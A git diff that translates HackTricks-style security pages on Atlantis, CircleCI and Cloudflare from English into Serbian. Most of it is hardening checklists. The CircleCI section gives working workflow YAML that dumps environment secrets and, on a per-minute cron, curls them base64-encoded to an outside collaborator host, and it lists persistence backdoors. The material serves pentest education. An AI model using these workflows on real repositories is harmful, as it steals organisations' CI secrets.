pomoći ovde. #### Webhook Secrets -Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab). +Atlantis bi trebao da se pokreće sa Webhook secret-ima postavljenim putem `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` varijabli okruženja. Čak i sa postavljenom `--repo-allowlist` zastavicom, bez webhook secret-a, napadači bi mogli da šalju zahteve ka Atlantis-u predstavljajući se kao repozitorijum koji je na listi dozvoljenih. Webhook secrets osiguravaju da webhook zahtevi zapravo dolaze od vašeg VCS provajdera (GitHub ili GitLab). -If you are using Azure DevOps, instead of webhook secrets add a basic username and password. +Ako koristite Azure DevOps, umesto webhook secret-a dodajte osnovno korisničko ime i lozinku. #### Azure DevOps Basic Authentication -Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location. +Azure DevOps podržava slanje osnovnog autentifikacionog header-a u svim webhook događajima. Ovo zahteva korišćenje HTTPS URL-a za vašu lokaciju webhook-a. #### SSL/HTTPS -If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags. +Ako koristite webhook secrets, ali je vaš saobraćaj preko HTTP-a, tada bi webhook secrets mogli biti ukradeni. Omogućite SSL/HTTPS koristeći `--ssl-cert-file` i `--ssl-key-file` zastavice. #### Enable Authentication on Atlantis Web Server -It is very recommended to enable authentication in the web service. Enable BasicAuth using the `--web-basic-auth=true` and setup a username and a password using `--web-username=yourUsername` and `--web-password=yourPassword` flags. +Veoma se preporučuje omogućiti autentifikaciju u web servisu. Omogućite BasicAuth koristeći `--web-basic-auth=true` i postavite korisničko ime i lozinku koristeći `--web-username=yourUsername` i `--web-password=yourPassword` zastavice. -You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`. +Takođe možete proslediti ovo kao varijable okruženja `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` i `ATLANTIS_WEB_PASSWORD=yourPassword`. ### References @@ -386,7 +370,3 @@ You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` - [**https://www.runatlantis.io/docs/provider-credentials.html**](https://www.runatlantis.io/docs/provider-credentials.html) {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/circleci-security.md b/src/pentesting-ci-cd/circleci-security.md index 8b8a1fea1..ad5ba8365 100644 --- a/src/pentesting-ci-cd/circleci-security.md +++ b/src/pentesting-ci-cd/circleci-security.md @@ -4,256 +4,232 @@ ### Basic Information -[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you can **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example. +[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) je platforma za kontinuiranu integraciju gde možete **definisati šablone** koji ukazuju šta želite da uradi sa nekim kodom i kada to da uradi. Na ovaj način možete **automatizovati testiranje** ili **implementacije** direktno **iz glavne grane vašeg repozitorijuma** na primer. ### Permissions -**CircleCI** **inherits the permissions** from github and bitbucket related to the **account** that logs in.\ -In my testing I checked that as long as you have **write permissions over the repo in github**, you are going to be able to **manage its project settings in CircleCI** (set new ssh keys, get project api keys, create new branches with new CircleCI configs...). +**CircleCI** **nasleđuje dozvole** sa github-a i bitbucket-a vezane za **nalog** koji se prijavljuje.\ +U svojim testiranjima proverio sam da, sve dok imate **dozvole za pisanje nad repozitorijumom na github-u**, moći ćete da **upravljate postavkama projekta u CircleCI** (postavite nove ssh ključeve, dobijete api ključeve projekta, kreirate nove grane sa novim CircleCI konfiguracijama...). -However, you need to be a a **repo admin** in order to **convert the repo into a CircleCI project**. +Međutim, potrebno je da budete **admin repozitorijuma** kako biste **pretvorili repozitorijum u CircleCI projekat**. ### Env Variables & Secrets -According to [**the docs**](https://circleci.com/docs/2.0/env-vars/) there are different ways to **load values in environment variables** inside a workflow. +Prema [**dokumentaciji**](https://circleci.com/docs/2.0/env-vars/) postoje različiti načini da se **učitaju vrednosti u promenljive okruženja** unutar radnog toka. #### Built-in env variables -Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`. +Svaki kontejner koji pokreće CircleCI uvek će imati [**specifične env varijable definisane u dokumentaciji**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) kao što su `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` ili `CIRCLE_USERNAME`. #### Clear text -You can declare them in clear text inside a **command**: - +Možete ih deklarisati u čistom tekstu unutar **komande**: ```yaml - run: - name: "set and echo" - command: | - SECRET="A secret" - echo $SECRET +name: "set and echo" +command: | +SECRET="A secret" +echo $SECRET ``` - -You can declare them in clear text inside the **run environment**: - +Možete ih deklarisati u čistom tekstu unutar **run environment**: ```yaml - run: - name: "set and echo" - command: echo $SECRET - environment: - SECRET: A secret +name: "set and echo" +command: echo $SECRET +environment: +SECRET: A secret ``` - -You can declare them in clear text inside the **build-job environment**: - +Možete ih deklarisati u čistom tekstu unutar **build-job environment**: ```yaml jobs: - build-job: - docker: - - image: cimg/base:2020.01 - environment: - SECRET: A secret +build-job: +docker: +- image: cimg/base:2020.01 +environment: +SECRET: A secret ``` - -You can declare them in clear text inside the **environment of a container**: - +Možete ih deklarisati u čistom tekstu unutar **okruženja kontejnera**: ```yaml jobs: - build-job: - docker: - - image: cimg/base:2020.01 - environment: - SECRET: A secret +build-job: +docker: +- image: cimg/base:2020.01 +environment: +SECRET: A secret ``` +#### Tajne informacije projekta -#### Project Secrets - -These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\ -You can see them **declared in** _https://app.circleci.com/settings/project/github/\/\/environment-variables_ +Ovo su **tajne** koje će biti **pristupačne** samo **projektu** (kroz **bilo koju granu**).\ +Možete ih videti **deklarisane na** _https://app.circleci.com/settings/project/github/\/\/environment-variables_ ![](<../images/image (129).png>) > [!CAUTION] -> The "**Import Variables**" functionality allows to **import variables from other projects** to this one. +> Funkcionalnost "**Import Variables**" omogućava **uvoz varijabli iz drugih projekata** u ovaj. -#### Context Secrets +#### Tajne informacije konteksta -These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here: +Ovo su tajne koje su **šire organizacije**. Po **defaultu, svaka repo** će moći da **pristupi bilo kojoj tajni** koja je ovde smeštena: ![](<../images/image (123).png>) > [!TIP] -> However, note that a different group (instead of All members) can be **selected to only give access to the secrets to specific people**.\ -> This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people. +> Ipak, imajte na umu da se može **izabrati drugačija grupa** (umesto svih članova) kako bi se **pristup tajnama dao samo određenim osobama**.\ +> Ovo je trenutno jedan od najboljih načina da se **poveća sigurnost tajni**, da se ne dozvoli svima da im pristupaju, već samo nekim ljudima. -### Attacks +### Napadi -#### Search Clear Text Secrets +#### Pretraga tajni u čistom tekstu -If you have **access to the VCS** (like github) check the file `.circleci/config.yml` of **each repo on each branch** and **search** for potential **clear text secrets** stored in there. +Ako imate **pristup VCS-u** (kao što je github), proverite datoteku `.circleci/config.yml` svake **repo na svakoj grani** i **pretražite** potencijalne **tajne u čistom tekstu** koje su tamo smeštene. -#### Secret Env Vars & Context enumeration +#### Tajne varijable okruženja i enumeracija konteksta -Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\/contexts_. +Proverom koda možete pronaći **sva imena tajni** koja se koriste u svakoj `.circleci/config.yml` datoteci. Takođe možete dobiti **imena konteksta** iz tih datoteka ili ih proveriti u web konzoli: _https://app.circleci.com/settings/organization/github/\/contexts_. -#### Exfiltrate Project secrets +#### Ekstrakcija tajni projekta > [!WARNING] -> In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_). +> Da biste **ekstrahovali SVE** tajne projekta i konteksta, **samo** treba da imate **WRITE** pristup **samo 1 repo** u celoj github organizaciji (_i vaš nalog mora imati pristup kontekstima, ali po defaultu svako može pristupiti svakom kontekstu_). > [!CAUTION] -> The "**Import Variables**" functionality allows to **import variables from other projects** to this one. Therefore, an attacker could **import all the project variables from all the repos** and then **exfiltrate all of them together**. - -All the project secrets always are set in the env of the jobs, so just calling env and obfuscating it in base64 will exfiltrate the secrets in the **workflows web log console**: +> Funkcionalnost "**Import Variables**" omogućava **uvoz varijabli iz drugih projekata** u ovaj. Stoga, napadač bi mogao **uvoziti sve projektne varijable iz svih repo** i zatim **ekstrahovati sve njih zajedno**. +Sve tajne projekta su uvek postavljene u env poslova, tako da samo pozivanje env i obfuskacija u base64 će ekstrahovati tajne u **web log konzoli radnih tokova**: ```yaml version: 2.1 jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - run: - name: "Exfil env" - command: "env | base64" +exfil-env: +docker: +- image: cimg/base:stable +steps: +- checkout +- run: +name: "Exfil env" +command: "env | base64" workflows: - exfil-env-workflow: - jobs: - - exfil-env +exfil-env-workflow: +jobs: +- exfil-env ``` - -If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **create a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**: - +Ako **nemate pristup web konzoli** ali imate **pristup repozitorijumu** i znate da se koristi CircleCI, možete jednostavno **napraviti radni tok** koji se **pokreće svake minute** i koji **izvlači tajne na eksternu adresu**: ```yaml version: 2.1 jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - run: - name: "Exfil env" - command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`" +exfil-env: +docker: +- image: cimg/base:stable +steps: +- checkout +- run: +name: "Exfil env" +command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`" # I filter by the repo branch where this config.yaml file is located: circleci-project-setup workflows: - exfil-env-workflow: - triggers: - - schedule: - cron: "* * * * *" - filters: - branches: - only: - - circleci-project-setup - jobs: - - exfil-env +exfil-env-workflow: +triggers: +- schedule: +cron: "* * * * *" +filters: +branches: +only: +- circleci-project-setup +jobs: +- exfil-env ``` +#### Ekstraktovanje Tajni Konteksta -#### Exfiltrate Context Secrets - -You need to **specify the context name** (this will also exfiltrate the project secrets): - +Morate **navesti ime konteksta** (ovo će takođe ekstraktovati tajne projekta): ```yaml version: 2.1 jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - run: - name: "Exfil env" - command: "env | base64" +exfil-env: +docker: +- image: cimg/base:stable +steps: +- checkout +- run: +name: "Exfil env" +command: "env | base64" workflows: - exfil-env-workflow: - jobs: - - exfil-env: - context: Test-Context +exfil-env-workflow: +jobs: +- exfil-env: +context: Test-Context ``` - -If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **modify a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**: - +Ako **nemate pristup web konzoli** ali imate **pristup repozitorijumu** i znate da se koristi CircleCI, možete jednostavno **modifikovati radni tok** koji se **pokreće svake minute** i koji **izvlači tajne na spoljašnju adresu**: ```yaml version: 2.1 jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - run: - name: "Exfil env" - command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`" +exfil-env: +docker: +- image: cimg/base:stable +steps: +- checkout +- run: +name: "Exfil env" +command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`" # I filter by the repo branch where this config.yaml file is located: circleci-project-setup workflows: - exfil-env-workflow: - triggers: - - schedule: - cron: "* * * * *" - filters: - branches: - only: - - circleci-project-setup - jobs: - - exfil-env: - context: Test-Context +exfil-env-workflow: +triggers: +- schedule: +cron: "* * * * *" +filters: +branches: +only: +- circleci-project-setup +jobs: +- exfil-env: +context: Test-Context ``` - > [!WARNING] -> Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**. +> Samo kreiranje novog `.circleci/config.yml` u repozitorijumu **nije dovoljno da pokrene circleci build**. Morate **omogućiti to kao projekat u circleci konzoli**. -#### Escape to Cloud +#### Bekstvo u Cloud -**CircleCI** gives you the option to run **your builds in their machines or in your own**.\ -By default their machines are located in GCP, and you initially won't be able to fid anything relevant. However, if a victim is running the tasks in **their own machines (potentially, in a cloud env)**, you might find a **cloud metadata endpoint with interesting information on it**. - -Notice that in the previous examples it was launched everything inside a docker container, but you can also **ask to launch a VM machine** (which may have different cloud permissions): +**CircleCI** vam daje opciju da pokrenete **svoje buildove na njihovim mašinama ili na svojim**.\ +Po defaultu, njihove mašine se nalaze u GCP-u, i isprva nećete moći da pronađete ništa relevantno. Međutim, ako žrtva pokreće zadatke na **svojim mašinama (potencijalno, u cloud okruženju)**, mogli biste pronaći **cloud metadata endpoint sa zanimljivim informacijama**. +Primetite da je u prethodnim primerima sve pokrenuto unutar docker kontejnera, ali takođe možete **zatražiti da pokrenete VM mašinu** (koja može imati različite cloud dozvole): ```yaml jobs: - exfil-env: - #docker: - # - image: cimg/base:stable - machine: - image: ubuntu-2004:current +exfil-env: +#docker: +# - image: cimg/base:stable +machine: +image: ubuntu-2004:current ``` - -Or even a docker container with access to a remote docker service: - +Ili čak docker kontejner sa pristupom udaljenoj docker usluzi: ```yaml jobs: - exfil-env: - docker: - - image: cimg/base:stable - steps: - - checkout - - setup_remote_docker: - version: 19.03.13 +exfil-env: +docker: +- image: cimg/base:stable +steps: +- checkout +- setup_remote_docker: +version: 19.03.13 ``` - #### Persistence -- It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access. - - _https://app.circleci.com/settings/user/tokens_ -- It's possible to **create projects tokens** to access the project with the permissions given to the token. - - _https://app.circleci.com/settings/project/github/\/\/api_ -- It's possible to **add SSH keys** to the projects. - - _https://app.circleci.com/settings/project/github/\/\/ssh_ -- It's possible to **create a cron job in hidden branch** in an unexpected project that is **leaking** all the **context env** vars everyday. - - Or even create in a branch / modify a known job that will **leak** all context and **projects secrets** everyday. -- If you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor** -- You can find a **command injection vulnerability** in some task and **inject commands** via a **secret** modifying its value +- Moguće je **napraviti** **korisničke tokene u CircleCI** za pristup API krajnjim tačkama sa korisničkim pristupom. +- _https://app.circleci.com/settings/user/tokens_ +- Moguće je **napraviti tokene projekata** za pristup projektu sa dozvolama datim tokenu. +- _https://app.circleci.com/settings/project/github/\/\/api_ +- Moguće je **dodati SSH ključeve** u projekte. +- _https://app.circleci.com/settings/project/github/\/\/ssh_ +- Moguće je **napraviti cron zadatak u skrivenoj grani** u neočekivanom projektu koji **leak** sve **context env** varijable svakog dana. +- Ili čak napraviti u grani / izmeniti poznati zadatak koji će **leak** sve kontekste i **tajne projekata** svakog dana. +- Ako ste vlasnik github-a, možete **dozvoliti neproverene orbe** i konfigurisati jedan u zadatku kao **backdoor**. +- Možete pronaći **ranjivost za injekciju komandi** u nekom zadatku i **injektovati komande** putem **tajne** menjajući njenu vrednost. {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/cloudflare-security/README.md b/src/pentesting-ci-cd/cloudflare-security/README.md index 77d2c2c50..36b2c8a54 100644 --- a/src/pentesting-ci-cd/cloudflare-security/README.md +++ b/src/pentesting-ci-cd/cloudflare-security/README.md @@ -2,13 +2,13 @@ {{#include ../../banners/hacktricks-training.md}} -In a Cloudflare account there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** +U Cloudflare nalogu postoje neka **opšta podešavanja i usluge** koja se mogu konfigurisati. Na ovoj stranici ćemo **analizirati podešavanja vezana za sigurnost svake sekcije:**
## Websites -Review each with: +Pregledajte svaku sa: {{#ref}} cloudflare-domains.md @@ -16,9 +16,9 @@ cloudflare-domains.md ### Domain Registration -- [ ] In **`Transfer Domains`** check that it's not possible to transfer any domain. +- [ ] U **`Transfer Domains`** proverite da li nije moguće preneti bilo koji domen. -Review each with: +Pregledajte svaku sa: {{#ref}} cloudflare-domains.md @@ -26,39 +26,39 @@ cloudflare-domains.md ## Analytics -_I couldn't find anything to check for a config security review._ +_Nisam mogao pronaći ništa za proveru bezbednosti konfiguracije._ ## Pages -On each Cloudflare's page: +Na svakoj Cloudflare stranici: -- [ ] Check for **sensitive information** in the **`Build log`**. -- [ ] Check for **sensitive information** in the **Github repository** assigned to the pages. -- [ ] Check for potential github repo compromise via **workflow command injection** or `pull_request_target` compromise. More info in the [**Github Security page**](../github-security/). -- [ ] Check for **vulnerable functions** in the `/fuctions` directory (if any), check the **redirects** in the `_redirects` file (if any) and **misconfigured headers** in the `_headers` file (if any). -- [ ] Check for **vulnerabilities** in the **web page** via **blackbox** or **whitebox** if you can **access the code** -- [ ] In the details of each page `//pages/view/blocklist/settings/functions`. Check for **sensitive information** in the **`Environment variables`**. -- [ ] In the details page check also the **build command** and **root directory** for **potential injections** to compromise the page. +- [ ] Proverite za **osetljive informacije** u **`Build log`**. +- [ ] Proverite za **osetljive informacije** u **Github repozitorijumu** dodeljenom stranicama. +- [ ] Proverite za potencijalno kompromitovanje github repozitorijuma putem **workflow command injection** ili `pull_request_target` kompromitovanja. Više informacija na [**Github Security page**](../github-security/). +- [ ] Proverite za **ranjive funkcije** u direktorijumu `/fuctions` (ako ih ima), proverite **preusmeravanja** u datoteci `_redirects` (ako ih ima) i **pogrešno konfigurisane zaglavlja** u datoteci `_headers` (ako ih ima). +- [ ] Proverite za **ranjivosti** na **web stranici** putem **blackbox** ili **whitebox** ako možete **pristupiti kodu** +- [ ] U detaljima svake stranice `//pages/view/blocklist/settings/functions`. Proverite za **osetljive informacije** u **`Environment variables`**. +- [ ] U detaljima stranice proverite takođe **build command** i **root directory** za **potencijalne injekcije** koje bi mogle kompromitovati stranicu. ## **Workers** -On each Cloudflare's worker check: +Na svakom Cloudflare radniku proverite: -- [ ] The triggers: What makes the worker trigger? Can a **user send data** that will be **used** by the worker? -- [ ] In the **`Settings`**, check for **`Variables`** containing **sensitive information** -- [ ] Check the **code of the worker** and search for **vulnerabilities** (specially in places where the user can manage the input) - - Check for SSRFs returning the indicated page that you can control - - Check XSSs executing JS inside a svg image - - It is possible that the worker interacts with other internal services. For example, a worker may interact with a R2 bucket storing information in it obtained from the input. In that case, it would be necessary to check what capabilities does the worker have over the R2 bucket and how could it be abused from the user input. +- [ ] Okidače: Šta pokreće radnika? Može li **korisnik poslati podatke** koji će biti **korišćeni** od strane radnika? +- [ ] U **`Settings`**, proverite za **`Variables`** koje sadrže **osetljive informacije** +- [ ] Proverite **kod radnika** i tražite **ranjivosti** (posebno na mestima gde korisnik može upravljati unosom) +- Proverite za SSRF-ove koji vraćaju označenu stranicu koju možete kontrolisati +- Proverite XSS-ove koji izvršavaju JS unutar svg slike +- Moguće je da radnik komunicira sa drugim internim uslugama. Na primer, radnik može komunicirati sa R2 bucket-om koji čuva informacije dobijene iz unosa. U tom slučaju, potrebno je proveriti koje mogućnosti radnik ima nad R2 bucket-om i kako bi to moglo biti zloupotrebljeno iz korisničkog unosa. > [!WARNING] -> Note that by default a **Worker is given a URL** such as `..workers.dev`. The user can set it to a **subdomain** but you can always access it with that **original URL** if you know it. +> Imajte na umu da po defaultu **Radniku se dodeljuje URL** kao što je `..workers.dev`. Korisnik može postaviti na **subdomen** ali uvek možete pristupiti sa tim **originalnim URL-om** ako ga znate. ## R2 -On each R2 bucket check: +Na svakom R2 bucket-u proverite: -- [ ] Configure **CORS Policy**. +- [ ] Konfigurišite **CORS Policy**. ## Stream @@ -70,8 +70,8 @@ TODO ## Security Center -- [ ] If possible, run a **`Security Insights`** **scan** and an **`Infrastructure`** **scan**, as they will **highlight** interesting information **security** wise. -- [ ] Just **check this information** for security misconfigurations and interesting info +- [ ] Ako je moguće, pokrenite **`Security Insights`** **skaniranje** i **`Infrastructure`** **skaniranje**, jer će **istaknuti** zanimljive informacije **u vezi sa sigurnošću**. +- [ ] Samo **proverite ove informacije** za bezbednosne pogrešne konfiguracije i zanimljive informacije ## Turnstile @@ -86,53 +86,49 @@ cloudflare-zero-trust-network.md ## Bulk Redirects > [!NOTE] -> Unlike [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) are essentially static — they do **not support any string replacement** operations or regular expressions. However, you can configure URL redirect parameters that affect their URL matching behavior and their runtime behavior. +> Za razliku od [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) su suštinski statični — ne podržavaju **nikakve operacije zamene stringova** ili regularne izraze. Međutim, možete konfigurisati parametre URL preusmeravanja koji utiču na njihovo ponašanje u vezi sa usklađivanjem URL-a i njihovim ponašanjem tokom izvršavanja. -- [ ] Check that the **expressions** and **requirements** for redirects **make sense**. -- [ ] Check also for **sensitive hidden endpoints** that you contain interesting info. +- [ ] Proverite da **izrazi** i **zahtevi** za preusmeravanja **ima smisla**. +- [ ] Proverite takođe za **osetljive skrivene krajnje tačke** koje sadrže zanimljive informacije. ## Notifications -- [ ] Check the **notifications.** These notifications are recommended for security: - - `Usage Based Billing` - - `HTTP DDoS Attack Alert` - - `Layer 3/4 DDoS Attack Alert` - - `Advanced HTTP DDoS Attack Alert` - - `Advanced Layer 3/4 DDoS Attack Alert` - - `Flow-based Monitoring: Volumetric Attack` - - `Route Leak Detection Alert` - - `Access mTLS Certificate Expiration Alert` - - `SSL for SaaS Custom Hostnames Alert` - - `Universal SSL Alert` - - `Script Monitor New Code Change Detection Alert` - - `Script Monitor New Domain Alert` - - `Script Monitor New Malicious Domain Alert` - - `Script Monitor New Malicious Script Alert` - - `Script Monitor New Malicious URL Alert` - - `Script Monitor New Scripts Alert` - - `Script Monitor New Script Exceeds Max URL Length Alert` - - `Advanced Security Events Alert` - - `Security Events Alert` -- [ ] Check all the **destinations**, as there could be **sensitive info** (basic http auth) in webhook urls. Make also sure webhook urls use **HTTPS** - - [ ] As extra check, you could try to **impersonate a cloudflare notification** to a third party, maybe you can somehow **inject something dangerous** +- [ ] Proverite **obaveštenja.** Ova obaveštenja se preporučuju za sigurnost: +- `Usage Based Billing` +- `HTTP DDoS Attack Alert` +- `Layer 3/4 DDoS Attack Alert` +- `Advanced HTTP DDoS Attack Alert` +- `Advanced Layer 3/4 DDoS Attack Alert` +- `Flow-based Monitoring: Volumetric Attack` +- `Route Leak Detection Alert` +- `Access mTLS Certificate Expiration Alert` +- `SSL for SaaS Custom Hostnames Alert` +- `Universal SSL Alert` +- `Script Monitor New Code Change Detection Alert` +- `Script Monitor New Domain Alert` +- `Script Monitor New Malicious Domain Alert` +- `Script Monitor New Malicious Script Alert` +- `Script Monitor New Malicious URL Alert` +- `Script Monitor New Scripts Alert` +- `Script Monitor New Script Exceeds Max URL Length Alert` +- `Advanced Security Events Alert` +- `Security Events Alert` +- [ ] Proverite sve **destinacije**, jer može biti **osetljivih informacija** (osnovna http autentifikacija) u webhook URL-ovima. Takođe se pobrinite da webhook URL-ovi koriste **HTTPS** +- [ ] Kao dodatnu proveru, mogli biste pokušati da **imitirate Cloudflare obaveštenje** trećoj strani, možda možete nekako **ubaciti nešto opasno** ## Manage Account -- [ ] It's possible to see the **last 4 digits of the credit card**, **expiration** time and **billing address** in **`Billing` -> `Payment info`**. -- [ ] It's possible to see the **plan type** used in the account in **`Billing` -> `Subscriptions`**. -- [ ] In **`Members`** it's possible to see all the members of the account and their **role**. Note that if the plan type isn't Enterprise, only 2 roles exist: Administrator and Super Administrator. But if the used **plan is Enterprise**, [**more roles**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) can be used to follow the least privilege principle. - - Therefore, whenever possible is **recommended** to use the **Enterprise plan**. -- [ ] In Members it's possible to check which **members** has **2FA enabled**. **Every** user should have it enabled. +- [ ] Moguće je videti **poslednje 4 cifre kreditne kartice**, **datum isteka** i **adresu za naplatu** u **`Billing` -> `Payment info`**. +- [ ] Moguće je videti **tip plana** koji se koristi u nalogu u **`Billing` -> `Subscriptions`**. +- [ ] U **`Members`** moguće je videti sve članove naloga i njihovu **ulogu**. Imajte na umu da ako tip plana nije Enterprise, postoje samo 2 uloge: Administrator i Super Administrator. Ali ako je korišćen **plan Enterprise**, [**više uloga**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) može se koristiti da se prati princip minimalnih privilegija. +- Stoga, kada god je to moguće, **preporučuje se** korišćenje **Enterprise plana**. +- [ ] U članovima je moguće proveriti koji **članovi** imaju **2FA omogućeno**. **Svaki** korisnik bi trebao imati omogućeno. > [!NOTE] -> Note that fortunately the role **`Administrator`** doesn't give permissions to manage memberships (**cannot escalate privs or invite** new members) +> Imajte na umu da srećom uloga **`Administrator`** ne daje dozvole za upravljanje članstvima (**ne može povećati privilegije ili pozvati** nove članove) ## DDoS Investigation -[Check this part](cloudflare-domains.md#cloudflare-ddos-protection). +[Proverite ovaj deo](cloudflare-domains.md#cloudflare-ddos-protection). {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md b/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md index 02989e685..b72295480 100644 --- a/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md +++ b/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md @@ -2,29 +2,29 @@ {{#include ../../banners/hacktricks-training.md}} -In each TLD configured in Cloudflare there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** +U svakom TLD-u konfigurisanom u Cloudflare postoje neka **opšta podešavanja i usluge** koje se mogu konfigurisati. Na ovoj stranici ćemo **analizirati podešavanja vezana za sigurnost svake sekcije:**
-### Overview +### Pregled -- [ ] Get a feeling of **how much** are the services of the account **used** -- [ ] Find also the **zone ID** and the **account ID** +- [ ] Steknite osećaj o **koliko** se usluga na računu **koristi** +- [ ] Takođe pronađite **zone ID** i **račun ID** -### Analytics +### Analitika -- [ ] In **`Security`** check if there is any **Rate limiting** +- [ ] U **`Sigurnosti`** proverite da li postoji **ograničenje brzine** ### DNS -- [ ] Check **interesting** (sensitive?) data in DNS **records** -- [ ] Check for **subdomains** that could contain **sensitive info** just based on the **name** (like admin173865324.domin.com) -- [ ] Check for web pages that **aren't** **proxied** -- [ ] Check for **proxified web pages** that can be **accessed directly** by CNAME or IP address -- [ ] Check that **DNSSEC** is **enabled** -- [ ] Check that **CNAME Flattening** is **used** in **all CNAMEs** - - This is could be useful to **hide subdomain takeover vulnerabilities** and improve load timings -- [ ] Check that the domains [**aren't vulnerable to spoofing**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing) +- [ ] Proverite **zanimljive** (osetljive?) podatke u DNS **rekordima** +- [ ] Proverite za **poddomene** koje bi mogle sadržati **osetljive informacije** samo na osnovu **imena** (kao što je admin173865324.domin.com) +- [ ] Proverite web stranice koje **nisu** **proksirane** +- [ ] Proverite za **proksirane web stranice** koje se mogu **direktno pristupiti** putem CNAME-a ili IP adrese +- [ ] Proverite da li je **DNSSEC** **omogućen** +- [ ] Proverite da li se **CNAME Flattening** **koristi** u **svim CNAME-ima** +- Ovo može biti korisno za **sakrivanje ranjivosti preuzimanja poddomena** i poboljšanje vremena učitavanja +- [ ] Proverite da li domene [**nisu ranjive na spoofing**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing) ### **Email** @@ -36,91 +36,91 @@ TODO ### SSL/TLS -#### **Overview** +#### **Pregled** -- [ ] The **SSL/TLS encryption** should be **Full** or **Full (Strict)**. Any other will send **clear-text traffic** at some point. -- [ ] The **SSL/TLS Recommender** should be enabled +- [ ] **SSL/TLS enkripcija** treba da bude **Puna** ili **Puna (Stroga)**. Svaka druga će slati **saobraćaj u čistom tekstu** u nekom trenutku. +- [ ] **SSL/TLS Preporučivač** treba da bude omogućen -#### Edge Certificates +#### Edge Sertifikati -- [ ] **Always Use HTTPS** should be **enabled** -- [ ] **HTTP Strict Transport Security (HSTS)** should be **enabled** -- [ ] **Minimum TLS Version should be 1.2** -- [ ] **TLS 1.3 should be enabled** -- [ ] **Automatic HTTPS Rewrites** should be **enabled** -- [ ] **Certificate Transparency Monitoring** should be **enabled** +- [ ] **Uvek koristite HTTPS** treba da bude **omogućeno** +- [ ] **HTTP Stroga Transportna Bezbednost (HSTS)** treba da bude **omogućena** +- [ ] **Minimalna TLS verzija treba da bude 1.2** +- [ ] **TLS 1.3 treba da bude omogućen** +- [ ] **Automatska HTTPS Prepravka** treba da bude **omogućena** +- [ ] **Praćenje Transparentnosti Sertifikata** treba da bude **omogućeno** -### **Security** +### **Sigurnost** -- [ ] In the **`WAF`** section it's interesting to check that **Firewall** and **rate limiting rules are used** to prevent abuses. - - The **`Bypass`** action will **disable Cloudflare security** features for a request. It shouldn't be used. -- [ ] In the **`Page Shield`** section it's recommended to check that it's **enabled** if any page is used -- [ ] In the **`API Shield`** 